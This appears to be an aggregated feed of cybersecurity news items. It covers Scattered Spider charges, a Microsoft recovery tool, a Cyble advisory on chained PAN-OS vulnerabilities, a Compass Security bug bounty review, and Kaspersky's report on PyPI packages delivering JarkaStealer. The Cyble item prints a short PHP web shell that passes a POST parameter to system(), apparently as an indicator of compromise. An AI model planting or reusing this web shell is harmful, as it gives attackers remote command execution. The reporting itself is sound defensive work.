A handful of names are being floated for key cyber positions by well-connected insiders and former high-ranking Trump officials, according to four people who spoke to Recorded Future News on the condition of anonymity to discuss the fluid deliberations.
The Record from Recorded Future News – Read More
Five alleged members of the notorious Scattered Spider hacking group have been charged with executing a sophisticated phishing…
Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News – Read More
Microsoft debuts Quick Machine Recovery tool to apply fixes even when machines are unable to boot, without needing physical access.
The post After CrowdStrike Outage, Microsoft Debuts ‘Quick Machine Recovery’ Tool appeared first on SecurityWeek.
SecurityWeek – Read More
Wiz, one of the most talked-about names in the world of cybersecurity, is making a significant acquisition to expand its product reach in cloud security, particularly with developers. It is buying Dazz, a specialist in security remediation and risk management. Sources tell us the deal is valued at $450 million in a mix of cash […]
© 2024 TechCrunch. All rights reserved. For personal use only.
Security News | TechCrunch – Read More
The future of cybersecurity isn’t about preventing every breach — it’s about learning and growing stronger with each attack.
darkreading – Read More
The German CERT has raised the alarm bells for the exploitation of chained vulnerabilities, urging users to patch them urgently as hundreds of vulnerable instances remain exposed around the country and the globe.
CERT-Bund warned in a notification on X earlier this week: “Attacks are already taking place. Customers should immediately secure their firewalls.” This warning was for two critical vulnerabilities, CVE-2024-0012 and CVE-2024-9474, in Palo Alto Networks’ PAN-OS.
Palo Alto confirmed that these bugs have been actively exploited in a limited set of attacks, tracking under the banner “Operation Lunar Peek.” These vulnerabilities allow attackers to gain unauthorized administrative privileges and execute arbitrary commands, posing a significant risk to organizations using affected devices.
While fixes have been released, the urgency of patching, monitoring, and securing firewall management interfaces has never been higher. This blog provides a detailed breakdown of the vulnerabilities, exploitation patterns, and actionable remediation strategies to safeguard against this ongoing threat.
These vulnerabilities are particularly dangerous when chained together, enabling unauthenticated remote command execution on vulnerable devices. Palo Alto said that it assesses with moderate to high confidence that a functional exploit chaining CVE-2024-0012 and CVE-2024-9474 is publicly available.
Palo Alto Networks’ Unit 42 team is actively tracking exploitation activities tied to these vulnerabilities. Key observations include:
Palo Alto Networks has released patches addressing both vulnerabilities. Organizations must upgrade to the following versions immediately:
Palo Alto Networks strongly recommends the following:
<?php $z=”system”;
if(${“_POST”}[“b”]==”iUqPd”)
{
$z(${“_POST”}[“x”]);
};
Organizations detecting evidence of compromise should:
https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-291133-1032
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474
The post German CERT Warns ‘Attacks are Happening,’ Urges PAN-OS Chained Vulnerabilities’ Patching appeared first on Cyble.
Blog – Cyble – Read More
The owners of the RSA Conference will make a $5 million investment a prerequisite for all 10 finalists at next year’s Innovation Sandbox.
The post RSA’s Innovation Sandbox: Cybersecurity Startups Must Accept $5 Million Investment appeared first on SecurityWeek.
SecurityWeek – Read More
Introduction
At Compass Security, we are proud to offer a fully managed bug bounty program tailored to the needs of both SMEs and larger enterprises. From scoping to payout, we manage every aspect of the process to ensure a seamless experience for our customers and valued hunters. In this blog post, we’ll take a look at our journey since the launch of our service in October 2023, highlighting key milestones, metrics and learnings gathered along the way.
We want to cut through the hype around bug bounty programs by publishing the real numbers, challenges and benefits in a transparent way.
From October 2023 onwards
Since October 2023, we have brought five customers on board, with more in the pipeline. Moreover, we are also eating our own dog food and running two programs, focusing on Compass Security’s infrastructure and the cyber training range developed by our sister company Hacking-Lab.
Specifically, we are very proud to be running the program for the European Organization for Nuclear Research (CERN), based in Meyrin (Geneva), which is probably the largest bug bounty program in Switzerland, next to Swisscom’s immense playground.
Let’s Talk Bounties
In total, hunters from all over the world have discovered over 30 valid bugs so far, resulting in a total payout of roughly CHF 15’000 and averaging at about CHF 500 per bug. Thirteen hunters have received payouts so far. The highest bounty paid was CHF 2’050.
So if you are considering launching a program you will find that it is not the masses that will jump on it and go after your scope but a few very dedicated hunters who will try to skim the cream . The set of criteria that hunters use to decide which program to jump on ranges from the novelty of the program, to scope, to maximum bounty payouts. We have learnt from discussions that European and Swiss hunters in particular will rarely invest their time in programs where the maximum bounty is below CHF 10’000. And we can confirm that most of the bounties we have paid have gone outside Europe. Mainly Asia and North America.
Key Metrics and Performance
Our managed programs received just over 200 reports in total. Some of the most interesting findings were subdomain takeover, account takeover, and exposure of sensitive resources. While most of the vulnerabilities were of low or medium severity, we also received a few high severity issues. Our triage process still varies in speed but is generally very fast. Payouts have also been very fast, but are occasionally affected by slow bank procedures. We have already built up a small community of hunters who submit new reports and keep us going.
With so many bugs, there are also many reports that do not qualify for a bounty.
Ineligible bugs are usually some form of report that either is no issue, has no real impact, lacks relevant proof or is defined in the program’s Rules of Engagement (RoE) as not being eligible for payment.
Duplicates, also known as collisions with Pwn2Own events, are bugs that have already been reported by another hunter and are therefore no longer eligible for a bounty. Understandably, this is one of the pain points and fears that come with bug hunting and puts pressure on hunters. Our general triage policy is to mark a report as duplicate if the same issue has already been reported and accepted for the same asset.
Most of the duplicates come from hunters smashing automated scanners at program scopes. Although we generally forbid scanning by program policy, some hunters still use it as an efficient means to perhaps grab some low hanging fruit or get an overview of the targets.
Beyond that, we sometimes get reports that are out of scope and address issues in assets that are not listed among our managed bug bounty programs, due to hunters not following the asset lists, mistakenly testing third-party services or excluded IP ranges, and for very human reasons such as typos in domain names.
Love From the Community
One of our hunters recently shared their positive experience with our bug bounty platform, praising our fast triage process and transparent payout system. His feedback underscores the importance of effective communication in building a respectful relationship that encourages continued collaboration.
I wanted to take a moment to express my appreciation for your exceptional bug bounty platform. I really like your platform and the immediate response of the triage team and the payout process is so fast and transparent.
So far i have been hunting on so many platforms. I find your triage to be the best out of them all with very well explained responses. I have learned a lot from you guys too while hunting. Your detailed explanations on my reports really helped me understand so many vulnerabilities that i find hard to understand. So, it is a great experience working with you guyz.
Looking forward to contribute more on your platform.
– GS
This is where we are heading. Trust, transparency, kindness and respect for those who contribute to the success of the programs we manage.
Cost and Earnings
For most of our programs we currently take a flat fee for every eligible bug report we handle, hand over to the customer, provide guidance on fixing and track status. We use this flat rate to cover triage efforts and continuous development of our very basic reporting platform.
Yes, we do not charge for false positives, duplicates or out of scope issues. It is our promise to keep these away from our customers.
Bug Bounty Buyers Guide
If you are considering starting a bug bounty program, we suggest you stick to the concept. Money for bugs. So consider free subscriptions that take a flat fee per relevant report. *shameless plug*
Unless you have super specific needs for huge maximum bounties, multi-user and multi-language features, unparalleled marketing of your program, fully automated integration into the DevOps process or advanced vulnerability management, an annual subscription fee is hard to justify. As for our statistics, we have sent out five valid reports per program so far.
Do not overthink which platform to choose. The number of hunters and programs on a platform is not very relevant. Hunters have started to pull and aggregate programs on their own dedicated pages to get an overview on the latest changes that are relevant to them. What really matters is the attractiveness of your program. High bounties, wide open scope and a big variety of technology . This is what makes you an interesting target.
Hunters are essentially freelancers. They are an ingenious crowd and have an entrepreneurial mindset when it comes to finding and “acquiring” new projects with potential. What they are looking for is interesting technology, fair treatment and quick payment.
And that is what we aim for. To grow our platform with interesting and large scopes, but also to make sure that the money goes where the hard work is done. Quickly.
Conclusion
As we reflect on our journey, we’re grateful for the valuable insights we’ve gained from our customers and hunters. We remain committed to continuously improve, and leverage feedback to refine our processes. If you have comments or are curious about specific figures, get in touch.
If you want to join our sustainable bug bounty journey then you will find more information on our managed bug bounty service at Compass Security Bug Bounty or contact us at team@compass-security.com.
Compass Security Blog – Read More
Our Global Research and Analysis Team (GReAT) experts have discovered two malicious packages in the Python Package Index (PyPI) – a popular third-party software repository for Python. According to the packages’ descriptions, they were libraries that allowed to work with popular LLMs (large language models). However, in fact, they imitated the declared functionality using the demo version of ChatGPT, and their main purpose was to install JarkaStealer malware.
The packages were available for download for more than a year. Judging by the repository’s statistics, during this time they were downloaded more than 1700 times by users from more than 30 countries.
The malicious packages were uploaded to the repository by one author and, in fact, differed from each other only in name and description. The first was called “gptplus” and allegedly allowed access to the GPT-4 Turbo API from OpenAI; the second was called “claudeai-eng” and, according to the description, also promised access to the Claude AI API from Anthropic PBC.
The descriptions of both packages included usage examples that explained how to create chats and send messages to language models. But in reality, the code of these packages contained a mechanism for interaction with the ChatGPT demo proxy in order to convince the victim that the package was working. Meanwhile, the __init__.py file contained in the packages decoded the data contained inside and downloaded the JavaUpdater.jar file from the GitHub repository. If Java was not found on the victim’s machine, it also downloaded and installed the Java Runtime Environment (JRE) from Dropbox. The jar file itself contained the JarkaStealer malware, which was used to compromise the development environment and for undetected exfiltration of stolen data.
JarkaStealer is malware, presumably written by Russian-speaking authors, which is used primarily to collect confidential data and send it to the attackers. Here’s what it can do:
The collected information is then archived, sent to the attacker’s server, and then deleted from the victim’s machine.
The malware authors distribute it through Telegram using the malware-as-a-service (MaaS) model. However, we also found the source code of JarkaStealer on GitHub, so it’s possible that this campaign didn’t involve the original authors of the malware.
We promptly informed PyPI administrators about the malicious implants in the gptplus and claudeai-eng packages, and as of now they’ve already been removed from the repository. However, there’s no guarantee that this (or a similar) trick won’t be pulled on some other platform. We continue to monitor activity related to the JarkaStealer malware and look for other threats in open source software repositories.
For those who downloaded and used one of the malicious packages, the main recommendation is to immediately delete it. The malware doesn’t have persistence functionality, so it’s launched only when the package is used. However, all passwords and session tokens that were used on a victim’s machine could have been stolen by JarkaStealer, and so should be immediately changed or reissued.
We also recommend that developers be especially vigilant when working with open source software packages, and inspect them thoroughly before integrating them into their projects. This includes a detailed analysis of the dependencies and the respective supply chain of software products – especially when it comes to such a hyped topic as the integration of AI technologies.
In this case, the author’s profile’s creation date on PyPI could have been a red flag. If you look closely at the screenshot above, you can see that both packages were published on the same day, while the account that published them was registered just a couple of days earlier.
In order to minimize the risks of working with third-party open source software packages and avoid an attack on the supply chain, we recommend including in DevSecOps processes the Kaspersky Open Source Software Threats Data Feed, which is designed specifically for monitoring used open source components in order to detect threats that might be hidden inside.
Kaspersky official blog – Read More
